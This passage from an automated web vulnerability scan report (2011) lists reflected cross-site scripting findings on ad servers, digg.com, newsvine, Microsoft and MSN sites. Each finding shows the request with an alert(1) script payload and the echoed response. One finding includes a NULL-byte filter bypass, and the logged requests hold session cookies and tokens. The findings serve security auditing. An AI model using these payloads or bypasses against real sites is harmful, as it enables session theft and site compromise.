__qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 941
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:3:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1394,2,14:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe5-82a5-4989a5927aac0"
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=420
Expires: Sun, 30 Jan 2011 02:15:07 GMT
Date: Sun, 30 Jan 2011 02:08:07 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/d3;referrer='+document.referrer+';tag=d7.zedo.com/bar/v16-401/d3/jsc/fm.js;qs=8ec49'-alert(1)-'d75dcf13764=1;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.random();}

if(
...[SNIP]...

5.186. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d122"%3balert(1)//d7d071229a8 was submitted in the q parameter. This input was echoed as 7d122";alert(1)//d7d071229a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=1394&r=13&d=14&q=7d122"%3balert(1)//d7d071229a8&$=&s=2&l=http%3A//atl.whitepages.com/adclick/CID%3D0000e376b2c762f700000000/relocate%3D&z=0.718691564630717 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; ZCBC=1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFad=3:0:0:1:0:0; FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:3:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1394,2,14:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=139
Expires: Sun, 30 Jan 2011 01:46:01 GMT
Date: Sun, 30 Jan 2011 01:43:42 GMT
Connection: close
Content-Length: 3401

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='7d122";alert(1)//d7d071229a8';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=7d122";alert(1)//d7d071229a8;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

var zzStr = "s=2;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=" + Math
...[SNIP]...

5.187. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f156'%3balert(1)//bd15349bb1d was submitted in the q parameter. This input was echoed as 6f156';alert(1)//bd15349bb1d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=1394&r=13&d=14&q=6f156'%3balert(1)//bd15349bb1d&$=&s=2&l=http%3A//atl.whitepages.com/adclick/CID%3D0000e376b2c762f700000000/relocate%3D&z=0.718691564630717 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; ZCBC=1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFad=3:0:0:1:0:0; FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:3:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1394,2,14:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=139
Expires: Sun, 30 Jan 2011 01:46:01 GMT
Date: Sun, 30 Jan 2011 01:43:42 GMT
Connection: close
Content-Length: 3401

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='6f156';alert(1)//bd15349bb1d';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=6f156';alert(1)//bd15349bb1d;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

...[SNIP]...

5.188. http://digg.com/search [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/search

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %008c368"><script>alert(1)</script>5d52155c97c was submitted in the REST URL parameter 1. This input was echoed as 8c368"><script>alert(1)</script>5d52155c97c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /search%008c368"><script>alert(1)</script>5d52155c97c HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:22:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163912321857224960%3A171; expires=Mon, 31-Jan-2011 01:22:01 GMT; path=/; domain=digg.com
Set-Cookie: d=f593f891442b6b6080b2b72090490e4e14224dcee90063fea3ae0b428929449e; expires=Fri, 29-Jan-2021 11:29:41 GMT; path=/; domain=.digg.com
X-Digg-Time: D=275117 10.2.129.3
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 5813

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/search%008c368"><script>alert(1)</script>5d52155c97c.rss">
...[SNIP]...

5.189. http://dm.de.mookie1.com/2/B3DM/2010DM/1860849269@x23 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1860849269@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b270"><script>alert(1)</script>1a31a3f7248 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM8b270"><script>alert(1)</script>1a31a3f7248/2010DM/1860849269@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; session=1296350849|1296350983

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:45:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM8b270"><script>alert(1)</script>1a31a3f7248/2010DM/1010174904/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

5.190. http://dm.de.mookie1.com/2/B3DM/2010DM/1860849269@x23 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1860849269@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3306c"><script>alert(1)</script>4eac73ea4c6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM3306c"><script>alert(1)</script>4eac73ea4c6/1860849269@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; session=1296350849|1296350983

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:45:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM3306c"><script>alert(1)</script>4eac73ea4c6/1471343948/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

5.191. http://dm.de.mookie1.com/2/B3DM/2010DM/1860849269@x23 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1860849269@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13dba"><script>alert(1)</script>b9c1e9ca4ed was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1860849269@x2313dba"><script>alert(1)</script>b9c1e9ca4ed?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; session=1296350849|1296350983

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:46:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/185326303/x2313dba"><script>alert(1)</script>b9c1e9ca4ed/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

5.192. http://engine2.adzerk.net/z/8277/adzerk1_2_4_43,adzerk2_2_17_45 [keywords parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://engine2.adzerk.net
Path:	/z/8277/adzerk1_2_4_43,adzerk2_2_17_45

Issue detail

The value of the keywords request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69611'-alert(1)-'c3bf7d1437a was submitted in the keywords parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /z/8277/adzerk1_2_4_43,adzerk2_2_17_45?keywords=php,facebook,iframe,facebook-like69611'-alert(1)-'c3bf7d1437a HTTP/1.1
Host: engine2.adzerk.net
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: StackOverflow=9ca49ffc9f664387a222c78c37b5b08e

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sun, 30 Jan 2011 15:14:53 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: StackOverflow=9ca49ffc9f664387a222c78c37b5b08e; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 2022
Connection: keep-alive

function cssLoad(css){var s=document.createElement('style');document.getElementsByTagName('head')[0].appendChild(s);if(!!window.ActiveXObject){document.styleSheets[document.styleSheets.length-1].cssTe
...[SNIP]...
<a href="http://engine.adzerk.net/redirect/0/2564/2444/8277/a03a4092904040e18e901a243e653d5f/43/1178/2288/634319972937586141?keywords=php%2cfacebook%2ciframe%2cfacebook-like69611'-alert(1)-'c3bf7d1437a" rel="nofollow" target="_blank" title="">
...[SNIP]...

5.193. http://helenaspopkin.newsvine.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://helenaspopkin.newsvine.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5470"-alert(1)-"2158d48b318 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?e5470"-alert(1)-"2158d48b318=1 HTTP/1.1
Host: helenaspopkin.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:53:12 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=f02f9cb34b8692be67ae217ef748e81a; expires=Sat, 25-Jan-2031 17:53:12 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 92187

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
currentCommentBox = commentId;var renderedCommentBox = renderCommentBox ("http://www.newsvine.com/_action","http://www.polls.newsvine.com/_vine/images/_/","1465752","http://helenaspopkin.newsvine.com/?e5470"-alert(1)-"2158d48b318=1", 0,commentId, "", "", groupId, friendListId, threadId, privateLabel, "01", -1);getElement("dynamicCommentBox_"+commentId).innerHTML = renderedCommentBox;placeSpellChecker ("commentsTextDiv_"+commen
...[SNIP]...

5.194. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://i4.services.social.microsoft.com
Path:	/search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c8a70<img%20src%3da%20onerror%3dalert(1)>1469ac780f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c8a70<img src=a onerror=alert(1)>1469ac780f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?appid=1000&scopeid=1&boxId=searchBox&btnId=submitSearch&watermark=Search%20all%20projects&overrideWatermark=true&searchLocation=%2fsite%2fsearch&allowEmptySearch=true&focusOnInit=True&minimumTermLength=3&c8a70<img%20src%3da%20onerror%3dalert(1)>1469ac780f8=1 HTTP/1.1
Host: i4.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://silverlight.codeplex.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_NVR_RU=0=technet:1=:2=; MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/12/2011 02:50:01&Microsoft.VisitStartDate=01/12/2011 02:50:01&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=NbkBuOI4W7cBv1mnAHhVbMOQZR4pSFpAnK7y46YYoMuoTqVfvpOJDTYUAUbtS2cNI8BvaR+SCC23nZMTeytyi7wNmiKQoC0huKoVOxO9PG4349NCx7DVlNmV/I4bkLVsQPDWI9Bsqfw4CAigE1dAh1BYCtKZo9uqxkgiGwXq+e0k2CWQBMJydEvQvf+a8Nmy0lBvBx9sMp029vD2knhH9q3cjQbZxn3d/T9SCIAmvvv/s2I5E7D3U2bYKmXA8D2pYaGjWhFIkGPPBwVNdZM0gBNghumGYE3ytU+ILnGMVeSvePI6D6PqDJrflWnDWzImxN5OE1evuVhNxF+HLtGrIkyVXonl+BTy57QP6nzOR8xDTgEwSjCHY8/Bk9JyRwZg7yIiU4jUEbrdJT2XMDr4AswK4Wiy1TGrclwPTNsTA9c0XB9nYdOMBy66L0gCAgZ5Xl2KxwR+ak8o2EGeRwJddAgw92owb1NRPjd/6vkOYqly9qWJu5Yj/8uUccCK8nxtzsHYjQ2KgbbGdKcZOJMx5arSS+8FsBl+/Opeqt5VTOk=&Microsoft.MicrosoftId=0237-9950-5424-5770; MC1=GUID=60c2f44dfd912641a24c313b7d619d75&HASH=4df4&LV=20111&V=3; WT_FPC=id=173.193.214.243-2629510496.30125799:lv=1294837831501:ss=1294837831501; omniID=1294458843112_6a73_9555_4be9_86ce555049db; msdn=L=1033; A=I&I=AxUFAAAAAAAWBwAAtB6/BX1JsfAlwGK0F9Loug!!&M=1; ixpLightBrowser=0

Response

HTTP/1.1 200 OK
ntCoent-Length: 12733
Content-Type: application/x-javascript
ETag: 7f87e1784ee58de46a57500030b11c25
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB29
Cache-Control: public, max-age=43200
Expires: Mon, 31 Jan 2011 02:59:00 GMT
Date: Sun, 30 Jan 2011 14:59:00 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 12733

if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
on(){new epx_searchBox({"allowEmptySearch":true,"appId":"1000","boxId":"searchBox","btnId":"submitSearch","focusOnInit":true,"maxTerms":null,"minimumTermLength":3,"paramsCallback":null,"queryParams":"&c8a70<img src=a onerror=alert(1)>1469ac780f8=1","scopeId":"1","searchLocation":"\/site\/search","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search all projects"}} ).init();});},
function
...[SNIP]...

5.195. http://ingame.msnbc.redacted/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ingame.msnbc.msn.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46847"><script>alert(1)</script>138d2fa70ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?46847"><script>alert(1)</script>138d2fa70ec=1 HTTP/1.1
Host: ingame.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.196. http://investing.money.redacted/investments/charts [Symbol parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://investing.money.redacted
Path:	/investments/charts

Issue detail

The value of the Symbol request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22b72"%3balert(1)//2badde9cef5 was submitted in the Symbol parameter. This input was echoed as 22b72";alert(1)//2badde9cef5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /investments/charts?Symbol=indu22b72"%3balert(1)//2badde9cef5 HTTP/1.1
Host: investing.money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ASP.NET_SessionId=d3e1tw3231xscnog3b1tosiy; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

5.197. http://js.revsci.net/gateway/gw.js [csid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 56c3d<script>alert(1)</script>22dd092b040 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=A0654656c3d<script>alert(1)</script>22dd092b040 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
